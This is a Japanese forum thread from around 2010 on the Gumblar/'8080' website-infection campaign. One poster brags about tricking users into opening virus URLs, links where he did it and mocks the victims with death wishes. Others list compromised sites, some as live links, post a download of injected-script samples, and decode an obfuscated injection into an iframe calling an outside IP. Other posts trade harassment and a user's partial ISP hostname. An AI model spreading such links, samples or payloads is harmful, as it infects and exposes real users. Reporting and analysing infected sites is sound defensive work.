頭悪いなぁ
そのくらいのことも自分で考えられないようじゃただの低脳だぜ

それに残念ながら
手本ならさっき踏ませてきたのがあるからな(�Vд�V)┌
http://pc11.2ch.net/test/read.cgi/net/1269123304/108n-

>>307
うむ、お前も低脳だな
ウィルスＵＲＬが晒されてるスレをこの俺様こと、顔文字が見てるのは至極自然なことだお

( ´,дゝ`)少し考えればわかることでは〜？ﾎﾞﾎﾎﾎﾎﾎwww

結局のとこ
俺様がゲーム感覚で行っていることも
常人にとってはとても難しいことだったりするわけか
てことはつまり・・・・










<(�V｀д´�V)>またエッヘン！ってなるお！
　　／　＼

>>308
一つのスレだけじゃ分からないよ
もっと詳しく教えてよ

なにその低脳のワンパターンな発想
俺様に言われたことへ反論できず、仕方なくワンパターンな流れに逃げているのだな
ならこっちも目には目をワンパターンには・・・

<(�V｀д´�V)>エッヘンパターンだお！！！！
　／　　＼

>>311
お前煽り方が下手糞杉
この手のコテにそういう煽りは逆効果
余計調子に乗るだけ

>>312
質問系でやった。

結構楽しいコレｗｗｗｗ

>>313

<(�V｀д´�V)>な、なにーーーーー俺が調子に乗っているだとおおお？
　　／　＼
l調子ll調子ll調子l
l調子ll調子ll調子l
＠＠＠＠＠＠＠＠

>>314

<(´�Vд�V｀)>やってきたスレを貼らないとな？
　　／　＼
l調子ll調子ll調子l
l調子ll調子ll調子l
＠＠＠＠＠＠＠＠

>>313
すまんかった。しかし春だからかな・・・・

>>316
ttp://gimpo.2ch.net/test/read.cgi/body/1261380362/864

ttp://pc11.2ch.net/test/read.cgi/pcqa/1087711030/446

ttp://pc11.2ch.net/test/read.cgi/pcqa/1258223156/632

>>317

<(´�VД�V｀)>ブワーッハッハッハッハ！！負け犬ザマァアア死ぬがよい！！！
　　／　＼
l調子ll調子ll調子l
l調子ll調子ll調子l
＠＠＠＠＠＠＠＠

意味がわからない

>>318
(�Vд�V)は？
まだ誰も踏んでねーじゃまいか
ただ貼っただけで誰も踏んでないしふぁびょってないではないか
貼っただけでお前は本気で楽しかったと言っているわけじゃあるまいな

( ´,дゝ`)=3 お前もう不合格だお

>>321
すまなかった・・・
そういう意味か・・・

分からなかった俺が悪いな。
一人でやるよ。

アドバイス有り難う。
ブログは読み続けるよ・・・

(�VД�V)おうよ！！！！
(�Vд�V)
�Vд�V)
д�V)
'д')
д')
')
)


三�Vд�V)ﾉｼ

Дブワハハハハハ！！
ガンブラー最高だわ！

今回は踏んだ奴にウィルスだとネタ晴らしせずに放置しまくったぞ
いつもならウィルスでしたー＞ｗ＜駆除ガンバ！
って俺がネタ晴らしするか、誰かしらがウィルスだと踏んでから気づくんだが

ガンブラーは踏んでもそれがウィルスだと気づかない奴ばかりだお＞ｗ＜どうなることやらｗ

genoの違約金っていくら払うの?商品を返品したいんだけど

>>325
板違い

8080系のオペラで踏んじゃったけどJRE入れて無かったら感染しない？

VB2010が何も反応しなかったけど、そういうウィルスなの？

url貼ってみ

↑のゴミコテが貼ったと思われるサイトです。

http://www.i-paradise5.jp/~simple/otona/index.php

　　　　　　ζ
　　　　　 ／￣￣￣￣＼
　　　　 /　　　　　　　　　＼
　　　　/＼ 　　　＼　 ／　｜
　　　　|||||||　　　(･)　　(･) ｜
　　　　(6-------◯⌒つ ｜　＜　バカモ〜ン！　また直リンしおって！
　　　　｜　　　　＿||||||||| ｜
　　　　　＼　／　＼＿/ ／
　　　　　　 ＼＿＿＿_／

>>330
8080系ウィルス感染済
ちなみにウィルスバスターは対応遅いからバスターだけ信用するのはどうかと思う
対策ソフトがウィルスとまで言われたウィルスセキュリティ0と比べたら遥かにマシだけど

>>331
申し訳ない

>>332
特にサイト運営やFTPソフト使ってないんで気にしてないんですが、
OS、ドライブフォーマットしないと駆除できませんかね？

>>330
ttp://www.virustotal.com/jp/analisis/6a3ae6f561b1b96efa19973bf12caa20aea9834c2627f9bb71a33442990c2526-1269205270
ttp://www.virustotal.com/jp/analisis/6a3ae6f561b1b96efa19973bf12caa20aea9834c2627f9bb71a33442990c2526-1269205270

>>333
>>2-4の2を適用していれば無問題

>>335
わざわざすいません。
早速実施します。

>>336
いまからじゃ無駄
OS、ドライブフォーマットせい

>>330>>336
(�VД�V)ブウァハハッハハハッハハハハッハッハ！！！！！ザッマァアアア！！！！ヒャーッハー！
考えなしにウィルス踏むだけでも低脳なのに
俺に踏まされたことを俺が居るところで言ってるところがますます低脳だな＞ｗ＜

そういう悔しそうな書き込みを見てしまうとますます俺様がヽ(�VД�V)ﾉ 喜んでしまうではないか！！！！
しかもお前、挙句の果てにドライブフォーマットするしかないとまで言われちゃって・・・笑

(�VД�V)ザッマァッァアァァアアみろ！死ねっ！！！お前のようなゴミはPCと一緒に焼却されてこいお(＞ｗ＜)

おっとPCはリサイクルできるか
でもお前はもう焼却されて死ぬしかないべ？(＞ｗ＜)そのくらい頭に血が上っているのでは〜？W

(*�Vд�V*)あーウケタw
(*�Vд�V*)まさか俺様にPC壊された低脳が来るとは・・・

・・・思ってたよ!!!!!(＞ｗ＜)!!!!!

(�Vд�V)今頃、せっかく休日なのに顔真っ赤にしてフォーマット作業してんだろな

(�Vд�V)そしてその間、俺様はというと
買い物行ったり、ゲームやったり、コーヒータイムを満喫したり、するわけだW


(�V｀д´�V)な、わかったろ
正義は勝つということだよね。これが天才顔文字様とウィルスを踏んじゃう低脳どもの差なのだお。

(�Vд�V)ここでURL鑑定したり
URLまとめてる連中も同罪だな。
むしろ俺様がウィルス踏ませるのは良い事をしているがURLまとめてる奴は悪だぜ。

なぜならここで手に入れたURLを踏ませてる奴だっているわけだからな(＞ｗ＜)

(�Vд�V)え？どこって？さぁ〜(笑)

そうだ、これ勇気スレにもマルチしとこっと

＞＞341
楽しいか？
よかったなカス

>341
pXXXX-XXXXXXXXhodogaya.kanagawa.ocn.ne.jp

>>343
341のＩＰ？ＯＣＮだと困るな・・・

>>343
串だろそれ。

串は全規制されないかなぁ。
こんな基地外も串全規制すれば来ないんじゃね？

>>344-345
■network/ISP/OCN逆引きホスト地域割当表
ttp://wiki.tomocha.net/network_ISP_OCN.html
>ipbf Bフレッツ
>神奈川県 hodogaya.kanagawa.ocn.ne.jp

pXXXX-ipbfXXXXhodogaya.kanagawa.ocn.ne.jp


<!-- ここにｱﾌｨ --!> とか･･･ワロタｗｗｗ

なんかすげーのが沸いてる

ローカルあぼ〜んも出来ないのかね、お前等

串サイトも危ないのかなあ

一般サイトも危ないのに串サイトなんて・・・

>>349
串使う事自体が頭おかしい

>>351
規制に巻き込まれた時にちょっと使うだけ・・・

>>352
代行レススレでいいじゃない
もしくは漫喫

●買えばいいよ

メモ用
http://www.jde-net.co.jp/engineering/index.php
http://www.kikuyakikai.com/

ζ
　　　　　 ／￣￣￣￣＼
　　　　 /　　　　　　　　　＼
　　　　/＼ 　　　＼　 ／　｜
　　　　|||||||　　　(･)　　(･) ｜
　　　　(6-------◯⌒つ ｜　＜　バカモ〜ン！　また直リンしおって！
　　　　｜　　　　＿||||||||| ｜
　　　　　＼　／　＼＿/ ／
　　　　　　 ＼＿＿＿_／

　　　　　　ζ
　　　　　 ／￣￣￣￣＼
　　　　 /　　　　　　　　　＼
　　　　/＼ 　　　＼　 ／　｜
　　　　|||||||　　　(･)　　(･) ｜
　　　　(6-------◯⌒つ ｜　＜　バカモ〜ン！　わしのAAを壊しおって！
　　　　｜　　　　＿||||||||| ｜
　　　　　＼　／　＼＿/ ／
　　　　　　 ＼＿＿＿_／

直リンしたのはあちこちでウィルス踏ませてる顔文字さんのためでもあるのです
誰かがウイルスに感染するのって面白いし人の不幸はおまんこの味がするしね
じゃんじゃん感染してけばいいとおもうにだ

>>341,358
ttp://ja.wikipedia.org/wiki/%E5%B9%87%E5%8A%A9%E7%8A%AF

マルウェアの作者と手を組んでやってるんじゃなくて
おまいらが陥落サイトのURLを貼って「勝手に手助け」してるだけだから

>共犯独立性説に立った場合には、実行従属性は不要となり、
>幇助行為が行われた時点で犯罪は完成する。

釣ったやつが感染して、情報流出等の被害が出た場合･･･
訴えられたら逮捕されるだろうねぇ。

>>359
↑踏んじゃった人必死だなー
いくらふぁびょっても誰も逮捕されないから
結局お前は泣き寝入りするしかないのであーるｗ

犯罪者の弁
「こんなことで捕まるとは思ってなかった」

こんなアホでも捕まってくれると良いけどね

>>339

お前、空しくならないか？

轢かれるとかで半身不随になってPCさわれなくなるのが望ましい。
もちろん貰いの貧乏事故で。

いまさらだが
>>263ってwindows7のultimateなのに、
DEP切って、applockerも使ってないの？
ultimateいらねぇじゃん
home にしてしまえw

Java Runtime Environment なんて>>3見て初めて知ったんですけど
これって皆さんやはりインストールしているのでしょうか・・・？
>>3の(1)〜(3)までは実行してあったのですが　もしかしたらこの状態だと覗いただけで感染してしまってたのでしょうか？

てんぷらよみなおせ

249-253まで凸完了

www●e-kudamono●co●jp/
googlでは引っかからないけどaguseではTrojan-Clicker.JS.Agent.mz

>>369
>>252

ウイルス作成は儲かるとか、ガンブラーを作ったチームは、一人一千万貰ったとかですが
それでも、一年に一回か二回は仕事をする必要があるんじゃないのかなー、と思うのです。

去年は、3月、10月、12月かな？
感染者がゼロからのスタートでご存知の通りの事態です。

次回は、残存感染サイト数、残存感染PC数から
更に鼠算式に拡大するのでしょうか。
ウイルスも差し替えられるのでしょうか。

出来れば、残存感染サイト数、残存感染PC数をゼロに近づけたいのですが
いろいろと限界があるのです。。。

文章書いてみたけど、書くことは何も無かった
って感じですね

勘違いもひどいし何が言いたいのか分からない
すごい文章だ

このスレも荒れてきたな・・・

所でこれもガンブラーだよな?
eroquis●s1●freexy●net/

>>374
お前眼科行ったほういいよ

>>375
ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://eroquis.s1.freexy.net/

>>376
ソースも確認出来ないチキンなの？

aisyw●com

>>377
＞ただいま移転作業中につき閉鎖しています
＞近日中にこのページも削除されますので、ご了承下さい
んで>>367

>>377
今は、改竄に気が付いて対応した後でコードはないが
>>347が発見した時にコードは有ったのかも知れない
>>367からもにコードは有ったのは確か

目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw

> 目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw

「>>367」をいちいち「>>376」と読み替えなきゃならないのもやっぱその類ですか?

>374
っていうか俺そのサイトよく訪れてたんですけど・・・
仮にgumblarに感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事もありえるのでしょうか？
その場合感染しているかどうか調べる方法はないのでしょうか？心配になってきた・・

>>381
サイトが改ざんされた＝Gumblar系列のウィルスを呼び出すスクリプトが埋め込まれた
とは限らないよ。

サイトの管理人もなにが置いてあったのか把握してないみたいだし
PCキレイにしたのかどうかもブログの文章からは判断できない。
特定するのは難しいんじゃない？

>感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事も
使ってるPCに脆弱性が残ってるなら感染するだろうね

「ガンブラー」「サイト改ざん」めぐる基本のＱ＆Ａ　〜　何が起きている？ 対策は？
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html

とうとう警視庁が動き出したようだな
むしろ遅すぎたが

ガンブラー問題でフランスなどに国際捜査協力を要請　海外５カ国のサーバ悪用　警視庁　[03/23]
http://yutori7.2ch.net/test/read.cgi/liveplus/1269320563/

【ネット】警視庁がガンブラー問題でフランスなどに国際捜査協力を要請　海外５カ国のサーバ悪用
http://tsushima.2ch.net/test/read.cgi/newsplus/1269327240/

とりあえずWindowsやアドビとかの脆弱性を全部埋めてセキュリティソフトを常に最新に保ち
常駐ソフト以外にもスパイボットとか入れてruとかのドメイン全部弾いて
Webブラウザ等を仮想化する

こんなもん？
出来ればCドライブ自体仮想化してしまえば何の心配もないんだろうけどな

スレチすまん。
ガンブラー系ではないかもしれないが、「igqjj.exe」ってのにやられてしまい今駆除中。
ググッても英文のサイトしか無く、情報少。誰か駆除できた方いませんか？

その英文のサイトにあった「Superなんとか」って言うソフトで駆除しているけど、どこを見てもそのソフトしか出てこない。
新種なのか？

で、感染源はどうやら「チュートリアルDVDの断片」らしい。英語で解説している（DL物）物だが、「まあ雰囲気で解るだろう」と
空けたのが間違いでそれに仕掛けてあったのか、乗ってきたのか定かではない。が、そのDL物ファイルを開けただけでは
見られないもので、アドレスやら何やら登録しないと始まらない仕様。

適当に架空の個人情報を入力し「サブミット」。たしかに映像は始まったが15分もしないうちにPCの挙動がおかしくなり
CORE2　が「フリーズ」。初めてフリーズしたところを　このマシンでみた。　うかつだった。

情報ありましたら、よろしくお願いします。重ねてスレチ、すみません。

こっちいｋ

【ウィルス情報質問　総合スレッド★Part47】＠セキュリティ
http://pc11.2ch.net/test/read.cgi/sec/1244633881/l50

>>386
スレチだと思うなら該当スレ探せよ
セキュ板に辿りつけたならわかるだろ

そもそも後半は何言ってるかわからん

＞DL物ファイルを開けただけでは見られないもので、アドレスやら何やら登録しないと始まらない
例の暴露ウィルスと似てるなｗ

ホームページもってないひとは感染しても気がつきにくいかもな

>>390
そうそう
っていうか現時点での確認方法は各アンチウイルスソフトによるスキャンしかないのかな？
検出しない所が多いみたいだけどさ

感染したら色々ぶち込まれるみたいだから大元の本体は無理でも何かしら拾えないのか？＞スキャン

偽セキュリティソフトが落とされたりすれば嫌でもわかるな

音素材サイト『ザ・マッチメイカァズ』がウイルス感染で閉鎖の危機
http://tsushima.2ch.net/test/read.cgi/news/1269516555/

>>394
マジかよ・・・

>>394
ちょｗｗ
マジで？

www●doomkeikaku●co●jp
株式会社レジナのホスティングが多すぎ

/.sys/?action=
っつーコードが複数サイトでインジェクションされてるってとあるサイトで見たんだが
どういうこったい

8080は強姦してくれるからわかりやすい
xは気がつかない人は一生気がつかないかも

8080はxmlrpc.phpにもつくのか…

【陥落サイトのURL悪用厳禁】
www●net-fukui●jp
www●doomkeikaku●co●jp/
seo●19th●org/
www●commentsexy●com/ ←ハニートラップｗｗｗ

現在の最新型は
("repl"+"XXXace".substr(Y))
これが含んでるっぽい

>>401
1番目と3番目の文法ミスってどうしておこるの？

>>402
作者に聞いてみないとわからないのでござる

>>401
上から順番に挿入部分だけ切り取ったスキャン結果どえ〜す
http://www.virustotal.com/jp/analisis/f7f75291ac95974de042295fddf9d17139acb088e5c7ddc1667a1244734e663c-1269577456
http://www.virustotal.com/jp/analisis/a5a170b4b43ce59dd76fbbef94fdf1a43bb12702f0716fda3aa48858023969d7-1269579080
http://www.virustotal.com/jp/analisis/057c1e463e53505366f4bd867346d2f7670405b447878a03adec8767f43a382a-1269577469
http://www.virustotal.com/jp/analisis/aca202528b5641f31eaae33a58287c4a6ecf791f5310b7266a86e603a8bf1838-1269577474
Avastが4/4
AVGが2/4
McAfeeが3/4
TrendMicro4/4
カスペルはVerの都合でヒューリスティック表記出ず
ノートンはドライブバイダウンロード阻止
いずれも4/4
こんなとこですかね〜

http://www1.axfc.net/uploader/Sc/so/96625.zip
一応4ファイル入りです
パスnews

【陥落サイトのURL悪用厳禁】
www●sankiblast●co●jp/ ←新型きたー

現在、発掘作業中･･･

【陥落サイトのURL悪用厳禁】
www●coaster-ya●com/
www●soul-wave●jp/MAME/
j-news●net/
discussanctuary●com/main●php ←！

www●daini-survey●com/
www●daini-survey●com/xmlrpc●php ←！

harappa-h●org/
harappa-h●org/AtoZ/modules/popnupblog/rss●php ←！

ががが･･･

>>407
これも新種なの・・・か？

jニュースが・・・

net-fukuiとdoomkeikaku
逃げるの早すぎてワロタｗｗｗ

>>408
「ただいま絶賛更新中」みたい

あとは･･･
http://search.yahoo.co.jp/search?p=%22%3Cscript%3Evar%22+%22new+String%28%29%3B%22+%22new+Date%28%29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript&ei=UTF-8&fr=top_ga1_sa&x=wrt&meta=fl%3D3
検索結果を見てくれ

>>410
よく覗いてたあのサイトも感染ったとは・・・

そのタグが新種か・・・
あとphpが多いけどドメイン範囲でphp感染してる？

最悪だな…もうどうにもならないんだね
1年も終息に向かわないなんて…
本当にこれの犯人は死刑では済まされないな
一日でも捕まる事を祈るしかないか…
ここまで新種が出たりして
ロシアンルーレット状態のネットなんかやりたくないよ…もう嫌だ

これじゃちょんぎって聖職者になるしかない

【陥落サイトのURL悪用厳禁】
j-news●net/だが･･･
include/external●js
/include/xoops●js
この2つもやられてた。

あと、デコード後のURLは
news-com-au●priceminister●com●timesonline-co-uk●TheSuperPager●ru:
8080
/5d6d●com/5d6d●com/rian●ru/homeway●com●cn/google●com●php
これで良いのかな？


>>411 陥落サイト＝感染したPCの中の情報次第。

>>404
Avira&MSE使えねー

ＡＶＧにしていて良かったと思ったら感染しそうで怖い。
ってかスペインかどっかで捕まったウィルス作成グループは
どうなったの？

Aviraは現物対応だからスクリプトでは無理。

なんだかんだで ru:8080/ もしくは :8080/ をURLブロックするのが一番楽？

:8080ごとブロックはやめとけ

>>416
あれは作者じゃなくてそれを買ってるユーザーだったような

>>420
そうなんだ。まぁ、ユーザー捕まえるのだけでも
意味あるかもね

>>415,417

ん？
JS/Redirector.KA KA.1 KA.2 KA.3
として検出されてますが？

virustotalで検出できない判定食らわされたからって現物のソフトが絶対検出できないって訳じゃない
virustotalでの検出可否は参考程度と思っといた方が良い

でも安心しちゃダメよ

.ruドメインの登録手続きが厳格化されるみたいだけど
そうなると.ru:8080が通用しなくなるのかな？
4月1日からだって

ロシアの「.ru」ドメインの登録手続きが厳格化へ――サイバー犯罪の防止がねらい
http://www.computerworld.jp/topics/vs/177469.html

.cn、.ruの次はどこが標的にされるでしょうね？

まさかの.jp

本家のlv(ラトビア)じゃないか？

>>427
なぜラトビアが本家？

>>414
http://www.virustotal.com/jp/analisis/6a96fbd33ce7b4e127b82050a7d64987b348b5b5c1451050b9bc5386c601a823-1269619137
結果: 1/42 (2.39%)
Jiangmin：Trojan/JS.Pegel.a

Jnewsって編集長がtwitterやってなかったか？

【陥落サイトのURLは悪用厳禁】
※他スレへの転載は自己責任で行って下さい。
www●okagrate●com/
www●tirashi●jp/
www●e-proactive●com●hk/
relaxsize●com/

■センセイは最新型を絶賛スルー中
http://www.google.co.jp/search?hl=ja&q=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%22&btnG=%E6%A4%9C%E7%B4%A2&lr=

>>431
3〜4連発入ってるやつがいるな
どうやったらこんな連発になるんだか

最近avastスレにここに報告されたアドレスが有用情報として貼られてます。しかもウイルス警告を否定する周到さ
既に2件確認済み

だからどうしろと

"今のところ"は対策しとけば感染はしない。セキュ板覗くような人は当然ながらやってるだろ
アドレス貼って楽しんでるようなアホは相手にしたら余計に貼るよ

安易にクリックしちゃうという行動もいかがなものかと思われるし
そういう人は痛い目見て学習したほうがいいんじゃないの

ウイルスサイト貼りを肯定はしないけどさ

2ch内のURLを安易にクリックするなってのはセキュ板じゃなくても基本だろ
基本を忘れちゃいかんよ

(�V｀д´�V)うむ、だからこそ俺様がウィルスURLを踏ませていることはエロイこと！
じゃなくて偉いこと！俺様にウィルス踏まされた馬鹿は
その経験のおかげでネット上で簡単にURLを踏む事の危険性に気づくってわけだ！
(�Vд�V)┌ まぁ本当の馬鹿は何回も引っかかるけどな。

つまり
(�V｀д´�V)俺様は反面教師、いや、必要悪を買って出てるってわけさ！
そして、それが俺様の人気の秘訣でもあるわけだ（�Vд＾）−☆ いつもブログに応援ありがとうねみんな！

禿の相手はしないように
これ基本な

新潟ライブカメラ　でなんかでた。

ここって個人ブログ晒して平気？さっきとあるブログ見てたらガンブラーって言うウィルスをブロックしたってノートン先生が教えてくれた。
だけどガンブラーをチェックするサイトでチェックしても出てこない。自分のＰＣが悪いの？

直接コード見て確認してからはるもんだろJK

>>440
どのチェックサイトを使ったんだよ

>>442
>>5のチェックサイト全部。
8080って奴だと思う。

それならソースも見たってことだろ
それでないなら無いんじゃないの

ノートンは何を見たんだ

ノートンは誤検出するほど優秀でウイルスバスターは誤検出するザル

更に、ソースネクストはウイルスバスター以下。

>>446-447
ttp://all-freesoft.net/v-kensyutsu/v-kensyutsu.html
■AV-Comparativesによるランク
★★★　G DATA・AVIRA・TrsutPort・PC Tools・Symantec・F-Secure・ESET
　　　　BitDefender・eScan・Avast・Kaspersky
★★　　McAfee・Panda・Microsoft・Sophos・AVG
★　　　K7
ゼロ　　Norman・Trend Micro・Kingsoft

バスターとKingは（以下略

>>448
誤検知を考えてもK7の方が上という罠

※ESETの防御率が4％しかない点を指摘された際の反論で、
ESET信者がセキュリティ板中に、VB100・AV-Comparatives・AV-Test.org等の
テスト結果コピペしていたのがバレてしまった瞬間。
http://pc11.2ch.net/test/read.cgi/sec/1207717191/47-49

>>450
4%ってPFWのことだろ？
ttp://www.matousec.com/projects/proactive-security-challenge/results.php
1本でおｋの統合型はザルが多いからなｗ

ファイアウォールじゃなくてHIPSのテストだろ
いい加減気づけよ

　 　(・∀・ )∀・ )
　　 と_,、⌒) )⌒) ) 　HIPSでーすイエーイ
　　　　 （_ ﾉﾉ_ ﾉﾉ

このウィルス踏んじゃったときすぐリカバリしたのに
俺のサイトが改ざんされてた。どゆこと？

踏んだ時にサイトのログインパスを抜かれたから要パス変更

http://www.jnews.com/
http://relaxsize.com/

この二つはもうウィルスじゃなくね？
え？直リンするよ？文句ある？じゃ死ねば？

オートコンプリート切ったらコンプリートされなくなったのでハゲです

>>456
jnewsは直ってる
relaxsizeはまだ感染中

感染してないよ

>>460
今見たら直ってるな
キャッシュの罠か？

>>456
jnews.com/ぢゃなくてj-news.net/（苦笑）
で、そのj-news.net/から告知が出てた
ttp://www.j-news.net/infomation/

IEのアドオンでShockwaveとAdobePDFLinkHelperは無効にしたほうがいいの？

根本がわかってないやつはなにやってもムダ

>>462
分からなかったらとりあえずアンインスコしとけ
どうせ使わんだろその辺

>>461
＞つきましては、以下ウィルスの内容や対処方法などを記述します。

ヲイヲイ、バスターで駆除して終わりかよ。
それで済むんなら、サイト閉鎖する必要無いだろうが

>>465
だな。　告知してるだけ「マシ」ってとこかな？

■サイト改ざん猛威：感染パソコンの修復は「OSの再インストール」が近道
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=2166
>8080のの攻撃では
〜〜中略〜〜
感染パソコンを感染前の状態に戻すのは、ほとんど絶望的と考えるのが賢明だ。
感染が確認された場合には、必要なデータをバックアップし、
OSを再インストールするのが確実な方法といえるだろう。

これを貼れば良いのに･･･

>>466
貼ったら貼ったで今度は一般人から非難続出だろうね。

今となってはアップデートすらしない自分の方が過失の度合いは大きいけどね。

216>>
mozilla add-ons の　epdfを使っています。軽い。

>>469
アンカーくらいちゃんと打ってください＞＜

470>>
は？なにいってんの
ちゃんとアンカされてるだろ

特定の専ブラだと安価になるのかね

その専ブラを知りたいね

Janeなら
数字を左クリックで選択反転させ、右クリックすると安価先がPOPされる

安価の＞や＜はもともとああいう使い方もしたようだが
ここは２ｃｈなので

こんな子供だましなウィルスに感染する奴って馬鹿なの？死ぬの？

>>474
> 数字を左クリックで選択反転させ　×
数字を左ダブルクリックで選択反転させ　○

今日JREの更新くるんだっけ

もうきてる
ついでにIE8のセキュパッチもきてるぞ

おい、こいつなんとかしてくれ

連日，相当 多数の皆さんが このページの駆除方法で
最低最悪のsecurity toolを駆除され，
再び 元通りにパソコンを使用出来たにも関わらず
ほとんどの皆さんから 何の喜びのメッセージをいただけません。
日本人の大人が，これほど礼儀知らずであったのでしょうか。
困っている場合に 手助けされる時，
お礼を言い合う習慣はなくなったのでしょうか。
　　　　　　　　　　　　　　　　私は 因みに 現在 64歳です。

http://8.pro.tok2.com/~miyuki-net-school/index.html

>479
前スレで出てたやつか
メールフォームから凸した人がいるが無視されてる

消去方法を削除してて、2000円払ったら教えるって書いてた時期もあった
間違いなく何言っても無駄だと思う

古いかもしれないが、ねっとなんて、昔はサービスの塊のようなものでやっていたもの
だと思うがな

金欲しいんだったら情報商材なんだからオークションで売れよw

なんの反応もないのに、なんで駆除できたと分かるんだ？

>>479
どんだけ上から目線なんだよｗｗｗ

>>479
ここって感染サイトだったの？

>>479
今イロイロ見てたら、このおじちゃん他人のブログやらOKやらで自分の駆除方法書きまくりじゃん。

そのうちここにも書いてきたりしてなｗ

人に礼を求める奴にろくなのはいない

私 金澤は 入会した翌日に 2円をゲットしました。
ささやかなお小遣いを希望される方に お奨めします。

まさに老害

>>479のジジイは偉そうなことを言ってるが、いい歳して自分が無防備である愚かさに気づいてないな・

http://headlines.yahoo.co.jp/hl?a=20100330-00000011-zdn_ep-sci
日本のつぶやきでも起こりそうだよね・・・

若干スレチだけど、JREとIE5〜8のアップデート来てます。

>>479の御老人･･･終わってますな。
ネット上からサイトごと消滅した方がいいと思う。

クリーンインストール前提で、必要なファイルのバックアップを取る為
「とりあえずマトモに動かせるようにする」と言う意味での
security tool削除ならわからなくもないが･･･
本体を殺してないのに「完全駆除」とは片腹痛いｗ

>>479
前半の日本語の意味が分からない
後半は驚いて何もいえない

>>479
こういうやつはウイルス流してるヤツらと同類だな
謝罪の為に首吊って死ぬべきだ
いや死ぬことすら生ぬるい

【陥落サイトのURL悪用厳禁】
www●weekly-monthly●biz/

1件だけ投下･･･

http://www.weekly-monthly.biz/

>>497
http://www.virustotal.com/jp/analisis/ebd3266daa5efdc32cbf5c28e92ba44ee2e4b27e52bb7909e49961de400e45ac-1270040161
http://www.virustotal.com/jp/analisis/ebd3266daa5efdc32cbf5c28e92ba44ee2e4b27e52bb7909e49961de400e45ac-1270040347
>>497
電凸完了

>>497
もう対策されてるわ〜。

12/40
http://www.virustotal.com/jp/analisis/f67be411f07ae4c9cb814111cd622875b58c607e38d30b373e6d9224a59a7fd9-1270059337

07/37
http://www.virustotal.com/jp/analisis/7aea9859778fd62be387bf5e2ed5efc3126ae5f7e094461d39956371a7ea4954-1270059628

【陥落サイトのURL悪用厳禁】
www●kadaru●mydns●to/ ←これやばくね？
www●jc-consulting●jp/ ←絶賛放置中
www●footsal-club●net/

「site:www●kadaru●mydns●to」
www●google●co●jp/search?hl=ja&source=hp&q=site%3Awww●kadaru●mydns●to&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
先生は絶賛スルー中...

【陥落サイトのURL悪用厳禁】
www●pokebai●net/

【陥落サイトのURL悪用厳禁】
vip.6to23.com/jogman←ビックリサイトのトップだが感染確認

>>505
"refresh"に5連発
.は●にしてほしいのです･･･
--
【陥落サイトのURL悪用厳禁】
www●ed-shop●com/
・Gumblarっぽいやつ
・<script>c10z27･･･
※めんどくさいから調べてない

ねる...

>>505
これはどこの記載で確認できるの？

ちょっと不便になるけどここまで来るとブラウザは常時仮想起動したほうがいいかな

>>508
ブラクラ専用ノート作れ

東原さんにガンブラーを話題にしてもらえば・・・

東原ウィルスが拡散すると聞いて

>>508
単純にJavascript切ればいいだけだアホ！

>>501
AviraとMSEは地雷か

>>512
そうNoScriptだな

>>512 >>514
そして.htaccessを改ざんするタイプに引っかかって感染、と・・・

.htaccessなんて表示されないのにどうやって防ぐのかと・・・

リダイレクトを全遮断して、リダイレクト先を確認するようにすればいいだろう。
煩わしさが半端ないから、よほど意志が強くない限りは続けられないと思うが。

>>517
まさにそれやってるけど大して煩わしさ感じない
そんなにリダイレクトしまくりなのか？

13/42
http://www.virustotal.com/jp/analisis/7378e619878ef1a422585f2b00cd59ef7d8508eb1d19713d7f75573344ffbd89-1270127899

kenichikaki●com
スタパン涙目

>>502
http://www.virustotal.com/jp/analisis/26bd267c6d3356a64d30e95e5ca2ed0066288ffe7f3ce0748abc02ca0edec0fc-1270129048
トレンドマイクロだと？

すまん、スクリプトが中途半端だったorz

10/42
http://www.virustotal.com/jp/analisis/26ae4dc8ed13843a5eba0195ad20ebaae717dfbe8e79e7c6664132b0e68079fb-1270129728

なるほど、その通り。
ttp://blog.f-secure.jp/archives/50382769.html

>>506
297B646F63756D656E742E777269746528756E65736361
7065282027253363253639253636253732253631
253664253635253230253665253631
253664253635253364253633253331
253330253230253733253732253633253364253237253638253734253734253730253361
253266253266253337253337253265253332253332253331
↓
){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%37%2e%32%32%31
↓
<iframe name=c10 src='http://77.221 〜

>>522んで
http://safeweb.norton.com/report/show?url=77.221.153.178

MSEはGumblarに無力なのか・・・

つか、>>2がきちんとできていればGumblarの方が無力なんだよ。

いまグーグルキャッシュでメッセサンオー個人情報流出中で
2ch中が祭り状態だけどこれウイルス？
それともメッセの会社としての管理問題？
とにかく名前、TEL、メアドと大変だ

>>526
流出の原因はシス管がうんこだから

>>526
見たら近所の奴がいたw

489 ：名無しさん必死だな：2010/04/02(金) 04:14:02 ID:cjzI0flq0
319 名前： 厚揚げ(関東地方) 投稿日：2010/04/02(金) 03:53:06.39 ID:7g2sF8Sk
購入履歴のページもやばいが、ある語句をつけて検索すると、
会員ごとの個人情報を直接編集する「管理者向けページ」が山のように出てくる。
客から、住所変更の依頼を受けたときなんかに使うページなんだろう。
これをGoogleさまが、ご丁寧に全ページをキャッシュしている。

このページは、会員が自分で決めたパスワードがソースの中に丸出しになってるから、
平文のパスワードが個人情報とセットで流出・・・こりゃ前代未聞の流出事件じゃないか？

ていうか大前提として、客が入力した大切なパスワードを、平文で保存しちゃダメだろ。

エログッズの買ったものリスト、住所、氏名、電話、性別、生年月日、
自分で決めたパスワードがセットで流出って、被害甚大すぎるだろ・・・

被害者は、1秒でも早く、ネットで共通で使っているパスワードを変えるべき。

496 ：名無しさん必死だな：2010/04/02(金) 04:16:34 ID:cjzI0flq0
>>489の続き
さらに、ある文字列で単純にGoogle検索するだけで、
買い物かごシステムの管理者用設定変更ページが、検索結果の1番目に出てくる。
これはシステム上のトップレベルの権限だから、ディレクトリから何まですべての設定が参照できてしまう。

